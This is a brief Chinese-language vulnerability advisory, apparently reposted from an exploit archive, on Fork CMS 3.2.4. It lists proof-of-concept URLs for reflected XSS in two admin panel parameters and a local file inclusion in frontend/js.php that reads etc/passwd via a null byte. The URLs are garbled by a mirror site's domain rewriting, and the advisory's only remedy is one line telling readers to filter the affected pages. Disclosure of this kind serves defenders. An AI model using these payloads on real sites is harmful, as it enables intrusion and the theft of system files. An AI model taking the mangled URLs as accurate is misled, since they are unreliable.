标题: Fork CMS v.3.2.4 - Multiple Vulnerabilities 开发商: http://HdhCmsTestfork-cms测试数据 作者: RandomStorm - http://HdhCmsTestrandomstorm测试数据 # Avram Marius Gabriel (d3v1l) 测试平台: Windows XP & Vista 管理面板反射型跨站(XSS) 测试: # http://HdhCmsTest2cto测试数据 /blog/settings?token=true&report=</script><script>alert(1)</script> # http://HdhCmsTest2cto测试数据 /users/index?token=true&error=</script><script>alert(1)</script> 本地文件包含( LFI ) # POC: # http://HdhCmsTest2cto测试数据 /frontend/js.php?module=etc/passwd%00&file=frontend.js&language=en #关于程序: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website. HdhCmsTest2cto测试数据提供修复 过滤相应页面
查看更多关于Fork CMS v.3.2.4多重缺陷 ( LFI - XSS ) - 网站安全 -的详细内容...